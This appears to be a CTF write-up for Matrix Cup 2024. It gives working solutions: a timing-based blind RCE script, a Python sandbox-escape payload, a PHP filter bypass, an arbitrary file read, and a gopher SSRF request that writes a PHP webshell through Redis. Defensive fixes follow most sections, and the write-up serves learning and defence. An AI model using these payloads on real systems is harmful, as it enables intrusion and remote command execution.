矩阵杯 2024 (Matrix Cup 2024)
This post was last updated 70 days ago; the information in it may have developed or changed since then.

Misc

真假补丁 (True or Fake Patch)

  • Export a self-extracting archive from the traffic capture; extracting it gives 补丁检测.exe and 补丁修复.exe. Submit them to a cloud sandbox first: nothing malicious, so run them in a VM.
  • I wanted to reverse it roughly to see the logic, but it is built with Nuitka and decompiling produces a huge mess, so I dropped that. Get the program running first: install Python 3.8.
  • Right, it has to run as the admin user or the paths are wrong; switch user and run it again.
  • 补丁检测.exe just runs a check and has nothing to do with the challenge.
  • 补丁修复.exe turns out to need requests and pycryptodome; a reasonable guess is that it encrypts something and then sends it somewhere.
  • Run again: good, no more missing libraries, now a missing file.
  • Now it runs more or less normally, except the request fails. Back to the capture: there is a POST /data.php carrying a value:
d7DxBWeC1sSz5LY3colz2jpYCYgRdwfNFKcy1LIs/5RCocrzCD7bN9Do95e8AJvT+xp5YgHNrilph3JfBZenoUzY5saQYer85vqow1reJBsR4Kv2dDNdlXrUFe8blY7t
  • Putting together the two packages installed while setting up the environment and the challenge name, a reasonable model of the program is: read the password from the admin desktop, encrypt it with pycryptodome, then send it with requests. The logic is clear; reversing is unrealistic (for me at least, a reversing expert could probably tear through it), so go the misc way and intercept the encryption directly: blind guess AES-CBC and patch the installed package's source.
  • Try it: works perfectly. The data is base64-encoded before the AES encryption, and the hook yields key and iv; mode=2, i.e. CBC mode. A quick first blood.
key: 324dd63a6365ca7729c8f85b6e479834
iv: ffe01db6b79092b8
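The interception step described above, as an added example rather than code from the challenge or from pycryptodome: hook_constructor() wraps a cipher constructor so that every call's key, mode and IV are logged before the real constructor runs. For the real sample the target would be AES.new from Crypto.Cipher (hook_constructor(AES, "new", log) after from Crypto.Cipher import AES); that import is an assumption about the environment, so the script drives the hook against a constructed stand-in module with the same call shape and runs without pycryptodome installed. The key and IV values in it are constructed, not the ones recovered from the sample.

```python
"""Capture the key, IV and mode a program hands to a cipher constructor."""
import functools
import types

# pycryptodome mode constants (AES.MODE_ECB == 1, AES.MODE_CBC == 2, ...)
MODE_NAMES = {1: "ECB", 2: "CBC", 3: "CFB", 5: "OFB", 6: "CTR", 11: "GCM"}


def hook_constructor(module, name, log):
    """Replace module.<name> with a wrapper that records key/mode/iv.

    Returns the original callable so the caller can restore it later.
    """
    original = getattr(module, name)

    @functools.wraps(original)
    def wrapper(key, mode, *args, **kwargs):
        # pycryptodome accepts the IV positionally or as iv=/IV=
        iv = kwargs.get("iv", kwargs.get("IV", args[0] if args else None))
        log.append({
            "key": bytes(key).hex(),
            "mode": MODE_NAMES.get(mode, f"mode={mode}"),
            "iv": bytes(iv).hex() if iv is not None else None,
        })
        return original(key, mode, *args, **kwargs)

    setattr(module, name, wrapper)
    return original


# --- constructed stand-in with pycryptodome's call shape (assumption) -------
class _StandInCipher:
    def __init__(self, key, mode, iv=None):
        self.key, self.mode, self.iv = key, mode, iv

    def encrypt(self, data):
        return data  # stand-in: no real encryption happens here


stand_in_aes = types.SimpleNamespace(
    MODE_CBC=2,
    new=lambda key, mode, iv=None: _StandInCipher(key, mode, iv),
)


def capture_from_stand_in():
    """Run a 'program' against the hooked module and return what was logged."""
    log = []
    original = hook_constructor(stand_in_aes, "new", log)
    # constructed key and IV, labelled as such; not the values from the sample
    cipher = stand_in_aes.new(bytes.fromhex("00112233445566778899aabbccddeeff"),
                              stand_in_aes.MODE_CBC, iv=b"0123456789abcdef")
    cipher.encrypt(b"example plaintext")
    setattr(stand_in_aes, "new", original)  # restore the module afterwards
    return log


if __name__ == "__main__":
    for entry in capture_from_stand_in():
        print(entry)
```

Because the wrapper logs and then calls through, the instrumented program behaves exactly as before, which is what makes this approach work on a packed binary you would rather not decompile: the only thing that changes is the copy of the library it imports.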

两极反转 (Polarity Reversal)

Two poles reversed, black and white no longer distinct.
Odd changes, even does not; horizontal changes, vertical does not.
(PS: you may need to know the structure of a QR code very well!
  • Taken literally: invert black and white, inverting odd rows but not even ones, and leaving the rows that contain the finder patterns alone.
from PIL import Image
import pyzbar.pyzbar as pyzbar

# Challenge image; the QR code is version 3, i.e. 29x29 modules
image = "8E2A248B-0EE8-42b2-B19B-C6A9CE0D47F8.png"
img = Image.open(image).convert("RGB")
# Shrink to one pixel per module so pixel (i, j) is module (i, j)
img = img.resize((29, 29), Image.NEAREST)
# Invert every other row in the data area (rows 8, 10, ..., 18); the rows
# occupied by the three finder patterns and their separators (0..7 and
# 21..28) are left as they are
for j in range(8, 20, 2):
    for i in range(29):
        if img.getpixel((i, j)) == (0, 0, 0):
            img.putpixel((i, j), (255, 255, 255))
        else:
            img.putpixel((i, j), (0, 0, 0))
# Scale back up so the decoder has enough pixels per module
img = img.resize((726, 726), Image.NEAREST)
img.show()
barcodes = pyzbar.decode(img)
print(barcodes)
for barcode in barcodes:
    print(barcode.data.decode("utf-8"))

What_CAN_I_SAY

  • A challenge by 空白, but it had a big problem: the builtins were never actually removed, so there were all kinds of unintended solutions.
safebuiltins_dict={x:y for x,y in dict(vars(__builtins__)).items() if x[0] not in "_-abcdefghijklmnopqrstuvwxyz"}
del __builtins__
try:exec(code,safebuiltins_dict,{})
except:pass
  • There is almost no output, but I wanted RCE anyway, so I extracted the result with a timing-based blind injection.
from pwn import *
from time import time

p = '{}abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
a = b"__import__('os').popen('cat /home/ctf/flag*').read()"
a = f'eval(bytes({str(list(a)).replace(" ","")}))'
template = f"""
a = {a}
if a[&&] == chr($$):
    eval(bytes([101,118,97,108,40,34,95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,115,121,115,116,101,109,40,39,115,108,101,101,112,32,50,39,41,34,41]))
what.can.i.say
<EOF>
"""
context.log_level = 'error'
for index in range(1000):
    for i in p:
        s = template.replace("&&", str(index))
        s = s.replace("$$", str(ord(i)))
        r = remote("pwn-32a2755c56.challenge.xctf.org.cn", 9999, ssl=True)
        recv = r.recvuntil(b">>>").decode()
        r.sendline(s.encode())
        a = time()
        r.recvuntil(b"?")
        b = time()
        r.close()
        if b - a > 1:
            print(i,end="")
            break
  • Assuming the builtins had been removed as intended: here is the writeup I borrowed from the author. The payload is extremely tight, only two or three characters short of the limit.
First like this, then like that, and then it is done.

try:what=1;what.can.i.say
except:
 try:().classImroIsubclassesIinitIglobalsIbuiltinsIsysItropmiIrunsboxIopenIevalI5f2e7b7d2f27
 except Exception as a:a=a.name;I=a[5];c,m,s,i,g,t,y,p,r,f,v,h=a.split(I);u,d,z,x,l,q=a.encode().fromhex(h).decode();n=u*2;p=p[::-1]
try:(z+I+d+n+c+n+d+n+m+n+d+y+x).format(I=[])
except Exception as e:o=e.obj[1]
try:(z+I+d+n+s+n+d+y+x).format(I=o)
except Exception as e:o=e.obj()[140]
try:(z+I+d+n+i+n+d+n+g+n+d+y+x).format(I=o)
except Exception as e:b=e.obj[n+t+n];y=b[n+p+n](y);r=b[v](q+b[f](r+l+u+r[:3]+u).read().split(q)[1]+q);y.stdout.write(r);y.stderr.write(r)
  • The core idea: obtain strings from Exception.name, then use str.format to reach attributes and get hold of sys.stdout, which is what is needed to print the flag.
  • Learned a new trick again (it has been long enough that it should be fine to post this now ( ̄︶ ̄)↗
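Why the builtins survived, as an added example that is not the challenge's code: when exec() is given a globals dict with no "__builtins__" key, CPython inserts the interpreter's real builtins into that dict before running the code, so the del __builtins__ in the main script changes nothing for the sandboxed code. The script below rebuilds the challenge's filter, then probes whether __import__ resolves under the original globals and under a globals dict whose "__builtins__" entry is set explicitly. The probe string is constructed for this example.

```python
"""Why `del __builtins__` does not strip builtins from exec(), and the fix."""
import builtins

# Constructed probe: it only succeeds if the name __import__ resolves.
PROBE = "result.append(__import__)"


def filtered_builtins():
    """Same filter as the challenge: drop names starting with '_', '-' or a-z."""
    return {name: value for name, value in vars(builtins).items()
            if name[0] not in "_-abcdefghijklmnopqrstuvwxyz"}


def probe_resolves(globals_dict):
    """Return True if the probe could resolve __import__ inside exec()."""
    result = []
    try:
        exec(PROBE, globals_dict, {"result": result})
    except NameError:
        return False
    return bool(result)


def original_sandbox():
    """Challenge behaviour: globals has no '__builtins__' key.

    CPython then stores the interpreter's real builtins under that key
    before the code runs, so every builtin is reachable again.
    """
    return probe_resolves(filtered_builtins())


def fixed_sandbox():
    """Fix: set '__builtins__' explicitly, so name lookup ends at the
    filtered dict instead of the real builtins."""
    safe = filtered_builtins()
    safe["__builtins__"] = dict(safe)
    return probe_resolves(safe)


if __name__ == "__main__":
    print("original globals, __import__ reachable:", original_sandbox())
    print("explicit __builtins__, __import__ reachable:", fixed_sandbox())
```

Even with "__builtins__" set correctly, exec() is not a security boundary: the intended solve above reaches sys through object introspection and str.format without touching a single builtin, so the fix closes the unintended path and nothing more. Where isolation actually matters, untrusted code belongs in a separate process or container with its own resource limits.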

Web

Easyweb

  • index.php
<?php
if (isset($_GET['id']) && floatval($_GET['id']) !== '1' && $_GET['id'] == 1)
{
    echo 'welcome,admin';
    $_SESSION['admin'] = True;
}
else
{
    die('flag?');
}
?>
<?php
if ($_SESSION['admin'])
{
    if(isset($_POST['code']))
    {
        if(preg_match("/(ls|c|a|t| |f|i|n|d')/", $_POST['code'])==1)
            echo 'no!';
        elseif(preg_match("/[@#%^&*()|\/?><']/",$_POST['code'])==1)
            echo 'no!';
        else
            system($_POST['code']);
    }
}
?>
  • /?id=1.0 passes the first check: floatval() returns a float, so !== '1' is always true, and '1.0' == 1 holds under PHP's loose comparison. l\s gets past the command filter.
  • Visit /718g.

where

  • It exposes an arbitrary file read endpoint: /look?file=/app/app.py
from flask import Flask,Response, request
app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def index():
    return "flag被我藏起来了,/look一下file看看呢"

@app.route('/look', methods=['GET', 'POST'])
def readfile():
    if request.values.get('file'):
        file = request.values.get('file')
        f = open(file, encoding='utf-8')  # path taken verbatim from the request
        content = f.read()
        f.close()
        if 'flag' in content:
            return "打卡下班"+content
        else:
            return "抓紧找,着急下班"+content

    return "找找看,我着急下班"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
  • Browsed the usual directories; the flag was in /root/.bash_history.
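The hardened counterpart of the /look handler, as an added example that is not the challenge's app: the original opens whatever path it is given, so /app/app.py and /root/.bash_history are one request away. resolve_under() canonicalises the requested name relative to a fixed base directory and refuses anything that does not stay below it, including absolute paths, .. components and symlinks inside the directory that point outside it. The directory tree it is exercised against is constructed in a temporary directory; the base directory name and the wiring into Flask in the note below are assumptions.

```python
"""Confine a file-read endpoint to one directory."""
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """Raised when a requested name would escape the base directory."""


def resolve_under(base_dir, requested):
    """Return the canonical path for `requested`, or raise UnsafePath."""
    if not requested or requested.startswith(("/", "\\")) or "\x00" in requested:
        raise UnsafePath(requested)
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()  # follows symlinks, collapses '..'
    try:
        candidate.relative_to(base)
    except ValueError:
        raise UnsafePath(requested) from None
    return candidate


def read_under(base_dir, requested):
    """The hardened equivalent of the challenge's open(file).read()."""
    path = resolve_under(base_dir, requested)
    if not path.is_file():
        raise FileNotFoundError(requested)
    return path.read_text(encoding="utf-8")


def demo():
    """Exercise the check against a constructed tree in a temp directory."""
    base = Path(tempfile.mkdtemp())
    (base / "docs").mkdir()
    (base / "docs" / "readme.txt").write_text("public document\n", encoding="utf-8")
    outside = base.parent / (base.name + "-outside.txt")  # next to base, not in it
    outside.write_text("secret\n", encoding="utf-8")

    results = {"docs/readme.txt": read_under(base, "docs/readme.txt")}
    for name in ("../" + outside.name, "docs/../../" + outside.name, str(outside)):
        try:
            read_under(base, name)
            results[name] = "allowed"
        except UnsafePath:
            results[name] = "rejected"

    # a symlink inside base that points outside must be rejected as well
    link = base / "link.txt"
    try:
        link.symlink_to(outside)
    except OSError:
        results["link.txt"] = "skipped"  # platform refused to create the link
    else:
        try:
            read_under(base, "link.txt")
            results["link.txt"] = "allowed"
        except UnsafePath:
            results["link.txt"] = "rejected"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r}: {outcome!r}")
```

In the Flask handler this becomes return read_under(PUBLIC_DIR, request.values.get('file', '')) with PUBLIC_DIR a directory that holds only files meant to be served; logging each UnsafePath with the offending name is also a cheap detection signal, since nobody legitimately asks for ../../root/.bash_history.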

tantanta

  • file:// gives arbitrary file read; aaaabbb.php:
<?php
error_reporting(0);
// error_reporting(E_ALL & ~E_WARNING);
// highlight_file(__FILE__);
$url=$_POST['data'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
  • Read /proc/net/tcp to see the port states: 6379, Redis.
  • Use gopher:// to reach Redis and write a webshell.
POST /aaabbb.php HTTP/1.1
Host: host
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ip:port/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 433

data=gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
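What the curl wrapper above is missing, as an added example that is not the challenge's code: it hands data= straight to curl, which speaks file:// and gopher:// as readily as http://, and it never looks at where the host resolves. check_outbound_url() allows only http and https, rejects credentials in the URL, resolves the host and refuses loopback, private, link-local and other non-public addresses. The resolver is injectable so the constructed URLs and hostnames below run offline; the default resolver uses socket.getaddrinfo.

```python
"""Validate a user-supplied URL before handing it to an HTTP client."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host):
    """Return every address the host resolves to (A and AAAA)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip):
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_outbound_url(url, resolver=default_resolver):
    """Return (allowed, reason, addresses).

    Connect to one of the returned addresses afterwards, not to the
    hostname again, or a DNS answer that changes between this check and
    the request (rebinding) can still steer the client to an internal host.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", []
    if not parts.hostname:
        return False, "missing host", []
    if parts.username or parts.password:
        return False, "credentials in URL", []
    try:
        addresses = resolver(parts.hostname)
    except (socket.gaierror, ValueError):
        return False, "unresolvable host", []
    bad = [a for a in addresses if not is_public_address(a)]
    if bad or not addresses:
        return False, f"non-public address {bad}", addresses
    return True, "ok", addresses


def demo():
    """Run the check over constructed URLs with a constructed resolver."""
    table = {  # constructed hostnames and answers
        "www.example": ["93.184.216.34"],
        "internal.example": ["10.0.0.5"],
        "localhost": ["127.0.0.1"],
    }

    def fake_resolver(host):
        try:
            return [str(ipaddress.ip_address(host))]  # literal address
        except ValueError:
            pass
        if host not in table:
            raise socket.gaierror(f"constructed resolver: unknown host {host}")
        return table[host]

    urls = [
        "http://www.example/report",
        "https://www.example/",
        "gopher://127.0.0.1:6379/",
        "file:///etc/hostname",
        "http://127.0.0.1:6379/",
        "http://[::1]/",
        "http://localhost/",
        "http://internal.example/admin",
        "http://user:pw@www.example/",
        "http://nosuch.example/",
    ]
    return {url: check_outbound_url(url, fake_resolver)[0] for url in urls}


if __name__ == "__main__":
    for url, allowed in demo().items():
        print(f"{'ALLOW ' if allowed else 'REJECT'} {url}")
```

In PHP the same scheme restriction is available directly on the curl handle via CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS set to CURLPROTO_HTTP | CURLPROTO_HTTPS, which also covers redirects. On the Redis side, the write-a-file path depends on CONFIG SET being reachable from the web host; binding Redis to localhost with protected-mode yes and requirepass set, or renaming CONFIG in redis.conf, removes that even if the SSRF itself remains.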